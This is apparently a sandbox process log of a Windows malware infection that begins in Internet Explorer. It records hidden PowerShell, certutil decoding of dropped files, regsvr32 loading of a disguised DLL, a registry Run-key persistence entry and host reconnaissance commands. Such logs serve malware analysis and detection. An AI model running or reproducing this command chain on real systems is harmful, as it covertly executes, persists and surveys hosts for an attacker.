iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2716 CREDAT:145409
2788powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\wGoWlR2.lVRJ C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2080certutil.exe "C:\Windows\system32\certutil.exe" -decode C:\Windows\..\ProgramData\wGoWlR2.lVRJ C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2184powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden cmd /c cmd /c cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2536cmd.exe "C:\Windows\system32\cmd.exe" /c cmd /c cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2664cmd.exe cmd /c cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2800cmd.exe cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
3052reg.exe reg add hkcu\software\microsoft\windows\currentversion\run -d "regsvr32.exe /s /n /i:1qaz2wsx5tgb \"C:\Users\test22\AppData\Roaming\IEServer\Update\IEServiceUpdate.dat\"" -t REG_SZ -v "IEProtectService" -f
1576cmd.exe cmd /c C:\Users\test22\AppData\Roaming\temp\B6A9.tmp.bat
2300regsvr32.exe regsvr32.exe /s /n /i:1qaz2wsx5tgb \"C:\Users\test22\AppData\Roaming\IEServer\Update\IEServiceUpdate.dat\"
1364cmd.exe c:\windows\system32\cmd.exe /c systeminfo & powershell Get-CimInstance -Namespace root/SecurityCenter2 -Classname AntivirusProduct & ipconfig /all & arp -a & net user & query user & dir "%programfiles%" & dir "%programfiles% (x86)" & dir "%programdata%\Microsoft\Windows\Start Menu\Programs" /s dir "%appdata%\Microsoft\Windows\Recent" & dir "%userprofile%\desktop" /s & dir "%userprofile%\downloads" /s & dir "%userprofile%\documents" /s
2064systeminfo.exe systeminfo
1064powershell.exe powershell Get-CimInstance -Namespace root/SecurityCenter2 -Classname AntivirusProduct
2136ipconfig.exe ipconfig /all
2228ARP.EXE arp -a
3012net1.exe C:\Windows\system32\net1 user
3036quser.exe "C:\Windows\system32\quser.exe"
3032cmd.exe cmd /c C:\Users\test22\AppData\Roaming\temp\D7F0.tmp.bat
2516explorer.exe C:\Windows\Explorer.EXE
1452